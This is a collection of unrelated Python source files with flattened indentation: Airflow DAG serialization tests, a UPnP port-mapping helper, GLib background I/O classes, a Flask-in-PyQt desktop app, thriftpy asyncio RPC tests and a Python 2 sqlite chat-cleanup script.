ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
Class for testing purposes: allows creating objects with custom attributes in a single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want to check that non-"basic" objects are turned into strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {
"is_subdag",
"tasks",
"has_on_success_callback",
"has_on_failure_callback",
"dag_dependencies",
}
keys_for_backwards_compat: set = {
"_concurrency",
}
dag_params: set = set(dag_schema.keys()) - ignored_keys - keys_for_backwards_compat
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that no new fields have been added to BaseOperator, and serves as a
reminder that serialization support and tests must be added for any new field.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
"""
Tests serialize_operator; makes sure the deps are serialized in sorted order
"""
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskSensor
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_deps_sorted", start_date=execution_date) as dag:
task1 = ExternalTaskSensor(
task_id="task1",
external_dag_id="external_dag_id",
mode="reschedule",
)
task2 = DummyOperator(task_id="task2")
task1 >> task2
serialize_op = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
deps = serialize_op["deps"]
assert deps == [
'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
]
def test_task_group_sorted(self):
"""
        Tests serialize_task_group, making sure the lists are in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.serialization.serialized_objects import SerializedTaskGroup
from airflow.utils.task_group import TaskGroup
"""
start
╱ ╲
╱ ╲
task_group_up1 task_group_up2
(task_up1) (task_up2)
╲ ╱
task_group_middle
(task_middle)
╱ ╲
task_group_down1 task_group_down2
(task_down1) (task_down2)
╲ ╱
╲ ╱
end
"""
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
start = DummyOperator(task_id="start")
with TaskGroup("task_group_up1") as task_group_up1:
_ = DummyOperator(task_id="task_up1")
with TaskGroup("task_group_up2") as task_group_up2:
_ = DummyOperator(task_id="task_up2")
with TaskGroup("task_group_middle") as task_group_middle:
_ = DummyOperator(task_id="task_middle")
with TaskGroup("task_group_down1") as task_group_down1:
_ = DummyOperator(task_id="task_down1")
with TaskGroup("task_group_down2") as task_group_down2:
_ = DummyOperator(task_id="task_down2")
end = DummyOperator(task_id='end')
start >> task_group_up1
start >> task_group_up2
task_group_up1 >> task_group_middle
task_group_up2 >> task_group_middle
task_group_middle >> task_group_down1
task_group_middle >> task_group_down2
task_group_down1 >> end
task_group_down2 >> end
task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_middle"]
)
upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
assert upstream_group_ids == ['task_group_up1', 'task_group_up2']
upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']
downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
assert downstream_group_ids == ['task_group_down1', 'task_group_down2']
task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_down1"]
)
downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
"""
Tests edge_info serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.edgemodifier import Label
with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
task1 = DummyOperator(task_id="task1")
task2 = DummyOperator(task_id="task2")
task1 >> Label("test label") >> task2
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.edge_info == dag.edge_info
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@parameterized.expand(
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
        Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
        in the serialized JSON blob, and that dag.has_on_success_callback is set to True when it is
        de-serialized. When the callback is not set, has_on_success_callback should not be stored in
        the serialized blob and so defaults to False on de-serialization.
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@parameterized.expand(
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
        Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
        in the serialized JSON blob, and that dag.has_on_failure_callback is set to True when it is
        de-serialized. When the callback is not set, has_on_failure_callback should not be stored in
        the serialized blob and so defaults to False on de-serialization.
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@parameterized.expand(
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{
"staging_schema": [
{"key:": "foo", "value": "bar"},
{"key:": "this", "value": "that"},
"test_conf",
]
},
{
"staging_schema": [
{"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
{
"__type": "dict",
"__var": {"key:": "this", "value": "that"},
},
"test_conf",
]
},
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
(
('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
),
]
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Sets are sorted while list and tuple preserve order"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "nbzz", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run nbzz, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
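# Hedged usage sketch (not part of the original module): the UPnP class above does
# all miniupnpc work on its own background thread and is driven through the queue,
# so callers only need remap()/release()/shutdown(). The port number is illustrative.
if __name__ == "__main__":
    upnp = UPnP()
    upnp.remap(8444)      # ask the worker thread to open TCP port 8444
    # ... application runs here ...
    upnp.release(8444)    # close the mapping again
    upnp.shutdown()       # stop and join the worker thread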
|
io.py
|
import os
import time
import threading
from queue import Queue
from gi.repository import GObject, GLib
class BackgroundIO(GObject.GObject):
__gsignals__ = {'data-received': (GObject.SIGNAL_RUN_FIRST, None,
(object, )),
'data-sent': (GObject.SIGNAL_RUN_FIRST, None,
(object, )), }
def __init__(self, *args, **kwargs):
super(BackgroundIO, self).__init__(*args, **kwargs)
self._send_queue = Queue()
@property
def name(self):
return self.__class__.__name__
def start_daemon(self):
self._receive_thread = threading.Thread(
target=self._run_receive_thread)
self._receive_thread.daemon = True
self._send_thread = threading.Thread(target=self._run_send_thread)
self._send_thread.daemon = True
self._receive_thread.start()
self._send_thread.start()
def send_data(self, data):
self._send_queue.put(data)
def _run_receive_thread(self):
raise NotImplementedError()
def _run_send_thread(self):
raise NotImplementedError()
@classmethod
def new_and_start(cls, *args, **kwargs):
instance = cls(*args, **kwargs)
instance.start_daemon()
return instance
class RandomDataGenerator(BackgroundIO):
def __init__(self, delay, *args, **kwargs):
super(RandomDataGenerator, self).__init__(*args, **kwargs)
self.delay = delay
def _run_send_thread(self):
while True:
data = b'ABC\n\x12'
GLib.idle_add(self.emit, 'data-sent', data)
time.sleep(self.delay)
def _run_receive_thread(self):
while True:
data = os.urandom(2)
GLib.idle_add(self.emit, 'data-received', data)
time.sleep(self.delay)
class Echo(BackgroundIO):
def _run_send_thread(self):
while True:
data = self._send_queue.get()
GLib.idle_add(self.emit, 'data-sent', data)
# receive right away
GLib.idle_add(self.emit, 'data-received', data)
def _run_receive_thread(self):
pass
class SerialIO(BackgroundIO):
def __init__(self, ser, *args, **kwargs):
super(SerialIO, self).__init__(*args, **kwargs)
self.ser = ser
@property
def name(self):
return self.ser.port
def _run_send_thread(self):
while True:
data = self._send_queue.get()
idx = 0
while idx != len(data):
bytes_sent = self.ser.write(data[idx:])
idx += bytes_sent
GLib.idle_add(self.emit, 'data-sent', data)
def _run_receive_thread(self):
while True:
data = self.ser.read()
GLib.idle_add(self.emit, 'data-received', data)
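# Hedged usage sketch (not part of the original module): the BackgroundIO subclasses
# above emit 'data-received'/'data-sent' via GLib.idle_add, so handlers run on the
# GLib main loop and a loop must be running. Handler names here are illustrative.
if __name__ == '__main__':
    def on_received(emitter, data):
        print('{} received: {!r}'.format(emitter.name, data))
    def on_sent(emitter, data):
        print('{} sent: {!r}'.format(emitter.name, data))
    gen = RandomDataGenerator.new_and_start(0.5)
    gen.connect('data-received', on_received)
    gen.connect('data-sent', on_sent)
    GLib.MainLoop().run()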
|
app.py
|
from threading import Thread
import sys
from flask import Flask, render_template
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtWebEngineWidgets import *
from time import sleep
webInstance = Flask(__name__)
# webInstance.config['PORT'] = 5000
@webInstance.route('/')
def index():
return render_template('index.html')
class MainWindow(QMainWindow):
def __init__(self, *args, **kwargs):
super(MainWindow,self).__init__(*args, **kwargs)
self.browser = QWebEngineView()
self.setWindowTitle("Application Title")
self.browser.setUrl(QUrl("http://127.0.0.1:5000"))
self.setCentralWidget(self.browser)
self.show()
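# Hedged note on the config below: use_reloader is kept False because the Werkzeug
# auto-reloader expects to run in the main thread, and here the main thread is owned
# by the Qt event loop while Flask runs on a daemon thread.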
webInstanceConfig = {'host': '127.0.0.1', 'port': 5000, 'threaded': True, 'use_reloader': False, 'debug': True}
Thread(target=webInstance.run, daemon=True, kwargs=webInstanceConfig).start()
# sleep(2)
app = QApplication(sys.argv)
window = MainWindow()
app.exec_()
|
test_aio.py
|
# -*- coding: utf-8 -*-
import os
import asyncio
# import uvloop
import threading
# asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
import time
import pytest
import thriftpy
thriftpy.install_import_hook()
from thriftpy.rpc import make_aio_server, make_aio_client # noqa
from thriftpy.transport import TTransportException # noqa
addressbook = thriftpy.load(os.path.join(os.path.dirname(__file__),
"addressbook.thrift"))
unix_sock = "/tmp/aio_thriftpy_test.sock"
SSL_PORT = 50442
class Dispatcher:
def __init__(self):
self.ab = addressbook.AddressBook()
self.ab.people = {}
@asyncio.coroutine
def ping(self):
return True
@asyncio.coroutine
def hello(self, name):
return "hello " + name
@asyncio.coroutine
def add(self, person):
self.ab.people[person.name] = person
return True
@asyncio.coroutine
def remove(self, name):
try:
self.ab.people.pop(name)
return True
except KeyError:
raise addressbook.PersonNotExistsError(
"{0} not exists".format(name))
@asyncio.coroutine
def get(self, name):
try:
return self.ab.people[name]
except KeyError:
raise addressbook.PersonNotExistsError(
"{0} not exists".format(name))
@asyncio.coroutine
def book(self):
return self.ab
@asyncio.coroutine
def get_phonenumbers(self, name, count):
p = [self.ab.people[name].phones[0]] if name in self.ab.people else []
return p * count
@asyncio.coroutine
def get_phones(self, name):
phone_numbers = self.ab.people[name].phones
return dict((p.type, p.number) for p in phone_numbers)
@asyncio.coroutine
def sleep(self, ms):
yield from asyncio.sleep(ms / 1000.0)
return True
@pytest.fixture(scope="module")
def aio_server(request):
loop = asyncio.new_event_loop()
server = make_aio_server(
addressbook.AddressBookService,
Dispatcher(),
unix_socket=unix_sock,
loop=loop
)
st = threading.Thread(target=server.serve)
st.daemon = True
st.start()
time.sleep(0.1)
@pytest.fixture(scope="module")
def aio_ssl_server(request):
loop = asyncio.new_event_loop()
ssl_server = make_aio_server(
addressbook.AddressBookService, Dispatcher(),
host='localhost', port=SSL_PORT,
certfile="ssl/server.pem", keyfile="ssl/server.key", loop=loop
)
st = threading.Thread(target=ssl_server.serve)
st.daemon = True
st.start()
time.sleep(0.1)
@pytest.fixture(scope="module")
def person():
phone1 = addressbook.PhoneNumber()
phone1.type = addressbook.PhoneType.MOBILE
phone1.number = '555-1212'
phone2 = addressbook.PhoneNumber()
phone2.type = addressbook.PhoneType.HOME
phone2.number = '555-1234'
# empty struct
phone3 = addressbook.PhoneNumber()
alice = addressbook.Person()
alice.name = "Alice"
alice.phones = [phone1, phone2, phone3]
alice.created_at = int(time.time())
return alice
async def client(timeout=3000):
return await make_aio_client(
addressbook.AddressBookService,
unix_socket=unix_sock, socket_timeout=timeout
)
async def ssl_client(timeout=3000):
return await make_aio_client(
addressbook.AddressBookService,
host='localhost', port=SSL_PORT,
socket_timeout=timeout,
cafile="ssl/CA.pem", certfile="ssl/client.crt",
keyfile="ssl/client.key")
@pytest.mark.asyncio
async def test_void_api(aio_server):
c = await client()
assert await c.ping() is None
c.close()
@pytest.mark.asyncio
async def test_void_api_with_ssl(aio_ssl_server):
c = await ssl_client()
assert await c.ping() is None
c.close()
@pytest.mark.asyncio
async def test_string_api(aio_server):
c = await client()
assert await c.hello("world") == "hello world"
c.close()
@pytest.mark.asyncio
async def test_string_api_with_ssl(aio_ssl_server):
c = await client()
assert await c.hello("world") == "hello world"
c.close()
@pytest.mark.asyncio
async def test_huge_res(aio_server):
c = await client()
big_str = "world" * 100000
assert await c.hello(big_str) == "hello " + big_str
c.close()
@pytest.mark.asyncio
async def test_huge_res_with_ssl(aio_ssl_server):
c = await ssl_client()
big_str = "world" * 100000
assert await c.hello(big_str) == "hello " + big_str
c.close()
@pytest.mark.asyncio
async def test_tstruct_req(person):
c = await client()
assert await c.add(person) is True
c.close()
@pytest.mark.asyncio
async def test_tstruct_req_with_ssl(person):
c = await ssl_client()
assert await c.add(person) is True
c.close()
@pytest.mark.asyncio
async def test_tstruct_res(person):
c = await client()
assert person == await c.get("Alice")
c.close()
@pytest.mark.asyncio
async def test_tstruct_res_with_ssl(person):
c = await ssl_client()
assert person == await c.get("Alice")
c.close()
@pytest.mark.asyncio
async def test_complex_tstruct():
c = await client()
assert len(await c.get_phonenumbers("Alice", 0)) == 0
assert len(await c.get_phonenumbers("Alice", 1000)) == 1000
c.close()
@pytest.mark.asyncio
async def test_complex_tstruct_with_ssl():
c = await ssl_client()
assert len(await c.get_phonenumbers("Alice", 0)) == 0
assert len(await c.get_phonenumbers("Alice", 1000)) == 1000
c.close()
@pytest.mark.asyncio
async def test_exception():
with pytest.raises(addressbook.PersonNotExistsError):
c = await client()
await c.remove("Bob")
@pytest.mark.asyncio
async def test_exception_with_ssl():
with pytest.raises(addressbook.PersonNotExistsError):
c = await ssl_client()
await c.remove("Bob")
@pytest.mark.asyncio
async def test_client_socket_timeout():
with pytest.raises(asyncio.TimeoutError):
try:
c = await ssl_client(timeout=500)
await c.sleep(1000)
except:
c.close()
raise
@pytest.mark.asyncio
async def test_ssl_socket_timeout():
# SSL socket timeout raises socket.timeout since Python 3.2.
# http://bugs.python.org/issue10272
with pytest.raises(asyncio.TimeoutError):
try:
c = await ssl_client(timeout=500)
await c.sleep(1000)
except:
c.close()
raise
@pytest.mark.asyncio
async def test_client_connect_timeout():
with pytest.raises(TTransportException):
c = await make_aio_client(
addressbook.AddressBookService,
unix_socket='/tmp/test.sock',
connect_timeout=1000
)
await c.hello('test')
|
cleanup_db.py
|
__author__ = 'anushabala'
import sqlite3
import time
import atexit
import json
from argparse import ArgumentParser
from cocoa.core.systems.human_system import HumanSystem
import multiprocessing
class DBCleaner():
SLEEP_TIME = 15
def __init__(self, db_file, chat_timeout, user_timeout):
self.db_file = db_file
self.chat_timeout = chat_timeout
self.user_timeout = user_timeout
self.cleaned_chats = set()
self._stop = False
@staticmethod
def cleanup(db_file, chat_timeout, user_timeout, cleaned_chats, sleep_time, q):
def _cleanup_corrupt_counts():
# this should never happen!
cursor.execute('''UPDATE scenario SET active=0 WHERE active < 0''')
def _update_inactive_chats(chats):
for chat_info in chats:
chat_id, sid, outcome, _, agent_types, start_time = chat_info
if chat_id not in cleaned_chats:
# if it's been longer than chat_timeout seconds since the chat started, and the chat
# wasn't previously cleaned up, update the scenario DB
agent_types = json.loads(agent_types)
partner_type = agent_types['0'] if agent_types['1'] == HumanSystem.name() else agent_types['1']
print "[Cleaner] Cleaned up chat with ID={}, partner_type={}, scenario_id={}".format(
chat_id, partner_type, sid
)
cursor.execute('''
UPDATE scenario SET active=active-1 WHERE partner_type=? AND scenario_id=?
''', (partner_type, sid))
cleaned_chats.add(chat_id)
def _find_incomplete_chats():
# print 'Finding timed out chats with no outcome'
cursor.execute('''SELECT * FROM chat WHERE outcome="" AND start_time <?''', (now-chat_timeout,))
# Select all incomplete chats (with empty outcomes) that have timed out
return cursor.fetchall()
def _is_connection_timed_out(userid):
cursor.execute('''SELECT connected_status, connected_timestamp FROM active_user WHERE name=?''', (userid,))
status, tmstp = cursor.fetchone()
if status == 0 and tmstp < now - user_timeout:
return True
return False
def _find_disconnected_user_chats():
"""
Find chats with no outcome where at least one human agent has been disconnected longer
than user_timeout seconds
:return:
"""
# print 'Finding chats with no outcome and users with timed out connections'
cursor.execute('''SELECT * FROM chat WHERE outcome=""''')
inc_chats = cursor.fetchall()
disconnected_chats = []
for chat_info in inc_chats:
chat_id, sid, outcome, agent_ids, agent_types, start_time = chat_info
agent_types = json.loads(agent_types)
agent_ids = json.loads(agent_ids)
human_idxes = [k for k in agent_types.keys() if agent_types[k] == HumanSystem.name()]
clean = False
for idx in human_idxes:
userid = agent_ids[idx]
if _is_connection_timed_out(userid):
# print "User %s connection timeout" % userid
clean = True
if clean:
disconnected_chats.append(chat_info)
return disconnected_chats
try:
conn = sqlite3.connect(db_file)
with conn:
cursor = conn.cursor()
now = time.time()
filters = [_find_incomplete_chats, _find_disconnected_user_chats]
for f in filters:
chats = f()
_update_inactive_chats(chats)
_cleanup_corrupt_counts()
q.put(cleaned_chats)
# print "[Cleaner] Sleeping for %d seconds" % sleep_time
time.sleep(sleep_time)
except sqlite3.IntegrityError:
print("WARNING: Rolled back transaction")
except KeyboardInterrupt:
if q.empty():
q.put(cleaned_chats)
def cancel(self):
print "[Cleaner] Stopping execution"
self._stop = True
def stopped(self):
return self._stop
def start(self):
print "[Cleaner] Starting execution"
while not self.stopped():
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.cleanup, args=(self.db_file, self.chat_timeout, self.user_timeout, self.cleaned_chats, self.SLEEP_TIME, q))
try:
p.start()
p.join()
self.cleaned_chats = q.get()
# print "[Cleaner] Awoke from sleep"
# print "[Cleaner] Cleaned chats from queue:", self.cleaned_chats
except KeyboardInterrupt:
# If program is killed, try to run cleanup one last time in case past run was interrupted
p.join()
self.cancel()
if not q.empty():
# print "[Cleaner] Got item from queue from killed process"
self.cleaned_chats = q.get()
# print self.cleaned_chats
